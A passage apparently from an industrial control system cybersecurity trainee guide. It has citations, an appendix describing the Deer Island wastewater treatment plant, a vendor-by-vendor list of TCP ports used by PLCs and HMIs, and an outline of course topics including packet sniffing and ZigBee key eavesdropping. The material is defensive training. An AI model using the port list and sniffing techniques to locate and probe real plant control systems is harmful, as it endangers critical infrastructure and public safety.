• FireEye, Inc, Mandiant M-Trends 2016, p. 4
• Patricia Harman, “50% of small businesses have been target of a cyber-attack,”
PropertyCasualty360.com, Oct. 7, 2015
• Mark Smith, “Huger rise in hack attacks as cyber-criminals target small business, "The
Guardian, Feb. 8, 2016
• Thor Olavsrud, “Companies complacent about data breach preparedness,” CIO, Oct. 28, 2016
• Jeff Goldman, “48 Percent of Companies don’t inspect the Cloud for Malware,” eSecurity Planet
(blog), Oct. 12, 2016
• Chris Brook, Kaspersky Lab, 91 Percent of Public-Facing ICS Components Are Remotely
Exploitable, July 11, 2016
• Mandiant M-Trends, p. 7 2016 Data Breach Investigation Report, p. 11
193 | P a g e
Appendix B: Dear Island Treatment Plant Wastewater
Collection and Treatment
WHERE DOES ALL THE SEWAGE COME FROM?

From people using water in kitchens and bathrooms in their homes and from commercial and industrial
use. Nearly half the state's population, over 2 million people in 43 communities, send sewage to
MWRA's treatment plants on the shores of Boston Harbor. Over 5,500 businesses and industries
contribute wastewater as well. In addition, nearly half of the total flow in MWRA sewers is from rainy-
weather street runoff and from below-ground cracks and faulty connections that allow groundwater into
the system.
194 | P a g e
HOW DOES SEWAGE GET TO THE TREATMENT PLANTS?

Sewage travels through three different sets of pipes. Water that is used in a home or industry is flushed
through a building's pipes until it reaches local sewers which are owned and operated by city and town
sewer departments. These 5,100 miles of local sewers transport the wastewater into 227 miles of
MWRA interceptor sewers. The interceptor sewers, ranging from 8 inches to 11 feet in diameter, carry
the region's wastewater to two MWRA treatment plants. Though most of the wastewater flows by
gravity some low-lying areas require pumping.
HOW DOES SEWAGE TREATMENT WORK?
MWRA provides preliminary primary and secondary treatment to its wastewater flows at the Deer Island
Treatment Plant. The first phase of secondary treatment began operating in July 1997. The treatment
process is as follows:
 Collection and Pumping
Sewage is piped from communities to several headworks where bricks, logs and other large
objects are screened out. Pumps draw the sewage through deep-rock tunnels under the harbor
to Deer Island.
 Preliminary Treatment
Mud and sand settle in a tank called a grit chamber. Later, this material, known as grit and
screenings, is taken to a landfill for environmentally safe disposal.
 Primary Treatment
The sewage then flows to primary settling tanks where up to 60% of the solids in the waste
stream settle out as a mixture of sludge and water. This primary treatment removes very few
toxic chemicals.
 Secondary Treatment
In the secondary treatment plant oxygen is added to the wastewater to speed up the growth of
micro-organisms. These microbes then consume the wastes and settle to the bottom of the
secondary settling tanks. After secondary treatment, 80-90% of human waste and other solids
have been removed. A significant proportion of toxic chemicals are also removed by this
process.
WHERE DOES ALL THE TREATED WASTEWATER AND SLUDGE GO?
The remaining wastewater is disinfected before it is discharged to the receiving waters (Massachusetts
Bay). This stream of treated wastewater, known as effluent, travels through a 9.5-mile Outfall
Tunnel bored through solid rock more than 250 feet below the ocean floor. The tunnel's final 1.25 mile
include 55 separate release points known as "diffusers." By extending to an area with water depths up
to 120 feet, this outfall provides a much higher rate of mixing and/or dilution than is possible with
present discharges into the shallow waters of Boston Harbor.
Sludge from primary and secondary treatment is processed further in sludge digesters, where it is
mixed and heated to reduce its volume and kill disease-causing bacteria. It is then transported through
the Inter-Island Tunnel to the pelletizing plant in Quincy, where it is dewatered, heat-dried and
converted to a pellet fertilizer for use in agriculture, forestry, and land reclamation.
195 | P a g e
Appendix C: TCP Ports used by PLC’s (Programmable
Logic Controllers) and HMI/OIT’s
8/24/2019 TCP Ports used by PLC's (Programmable Logic Controllers) and HMI/ OIT's - PLC
Remote Access plcremote.net/143-2/ 1/2
October 6, 2015 FAQs
List of TCP port numbers used by commercial equipment controllers:
 Allen Bradley – All newer Rockwell PLC’s: 44818

 Allen Bradley – Older Rockwell AB PLC5E and SLC5/05 use TCP 2222
 BECKHOFF Embedded PC: 48898
 Danfoss ECL Apex: 5050
 FATEK FB Series: 500
 GE Fanus Series 90-30: 18245
 GE SRTP uses TCP ports 18245 and 18246
 GE QuickPanels use TCP port: 57176
 HITACHI EHV Series: 3004
 KEYENCE KV-5000: 8501
 Korenix 6550: 502
 Koyo Ethernet: 28784
 LS GLOFA FEnet: 2004
 LS XGB FEnet: 2004
 LS XGK FEnet: 2004
 Memobus (Yaskawa MP Series Controllers): 502
 Mitsubishi FX: 1025
 MITSUBISHI FX3u (Ethernet): 5001
 MITSUBISHI MELSEC-Q (Ethernet): 4999
 MITSUBISHI MR-MQ100 (Ethernet): 4999
 MITSUBISHI QJ71E71 (Ethernet): 5002
 MODBUS TCP/IP (Ethernet): 502
 MODBUS Server (Modbus RTU Slave): 502
 Omron PLC: 9600
 Panasonic FP (Ethernet): 9094
 Panasonic FP2 (Ethernet): 8500
 Parker Drives using MODBUS TCP/IP (Ethernet): 502
 Red Lion HMI’s: 789
 SAIA S-BUS (Ethernet): 5050
 Schleicher XCX 300: 20547
 Siemens S7 protocol uses TCP Port: 102
 Toshiba Series PLC’s uses Modbus Port: 502
 Trio (MODBUS RTU, TCP/IP): 502
 Unitronics Socket1 – TCP slave: 20256
 Unitronics Socket2 – TCP slave: 502
 Unitronicsw Socket3 – TCP slave: 20257
 Wago CODESYS – TCP: 2455
 YAMAHA NETWORK BOARD Ethernet RCX series uses Telnet Port: 23
196 | P a g e
 YASKAWA MP Series Ethernet: 10000
 YASKAWA MP2300Siec: 44818
 YASKAWA SMC 3010 (Ethernet): 23
 Yokogawa FA-M3 (Ethernet): 12289
Newer Rockwell Allen Bradley Detailed Equipment List for TCP Port 44818
 1756-ENET
 1756-ENBT
 1756-EWEB
 1794-AENT
 1734-AENT
 1769-L35E, 1769-L32E
 1788-ENBT
 1761-NET-ENI
 1785-LXXE
 1785-ENET
 1747-L55x
 1763-L16x
 1766-L32x
 PowerMonitor 1000
 PanelView
 RSLinx Classic
 RSLinx Enterprise
 INTERCHANGE (rsicd)
Older Rockwell Allen Bradley Equipment List TCP Port 2222

 1785-Lxxe
 1785-ENET
 1771-DMC(x)
 1747-L55x
 5820-EI
 PowerMonitor II
 INTERCHANGE
 RSLinx Classic
197 | P a g e

401V Trainee Guide

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

401V Trainee Guide

Uploaded by

Copyright:

Available Formats

Disclaimer

This presentation is intended for informational and discussion purposes only.

Cybersecurity plan template

Introduction to Netlab video

Why establish an ICS evaluation program?

ICS evaluation methodology

Adversarial risk Analyst

Establish expected outcomes and products

Issues and findings

Control NIST 800-53Control Family Issue Discovery Risk

Remote access can

Lack of uniform time

 Priority to business is based on:

 Sample criticality analysis process (NISTIR 8179)1

 Obtain or define program goals and objectives, assumptions, and

 Scope/frame the analysis to a specific system or subsystem

Perfume Specialty Chemical Scenario

Why is your asset inventory challenging?

 Always scan your ICS network We have never caused an unacceptable

We should land somewhere in between.

Asset discovery activity

2. From the FILE menu select Import Files

5. Select the PCAP file

7. From the Import dialog

8. Once the import is complete

9. Select the Logical Graph

10. Use this information to fill in the PCS network diagram.

NOTE: This example is

Asset inventory prioritization

Asset inventory prioritization exercise

Cybersecurity plan mapping

Packets and protocols

Packets and protocols demonstration using Windump:

Packets and protocols activity #1

Packets and protocols demonstration using Wireshark:

1. Among the discovered functions, which ones appeared frequently? ______________________

3. Did any functions appear as unknown? ___________________________________________

Discover undesired activity demonstration

Let’s look at simple network,

Over time, more devices

Finally, the employees are

The resulting network appears rather crowded:

Critical Data Points

Real-world segmentation example #2:

Network segmentation exercise Consider:

Packets, protocols, and segmentation recap

Cybersecurity plan mapping

 A central log server can

Network IDS monitoring demonstration

Snort rules for ICS operation

Logging and monitoring exercise

Incident response plan

Incident response questions

Network Monitoring and Incident Response

Wi-Fi Protected Access (WPA) – Developed as a second-generation to WEP. Additional

Wi-Fi Protected Access Version 2 (WPA2) – A complete rewrite of the algorithm in

IEEE 802.15.4 protocol technologies

ISA100.11a – Wireless Systems for Industrial Automation: Process Control and

MiWi – Proprietary wireless protocols designed by Microchip Technology that use

WirelessHART – Wireless sensor networking technology based on the Highway

ZigBee – IEEE 802.15.4-based specification for a suite of high-level communication

ZigBee key eavesdropping

Kismet channel graph

Texas Instruments packet sniffing instructions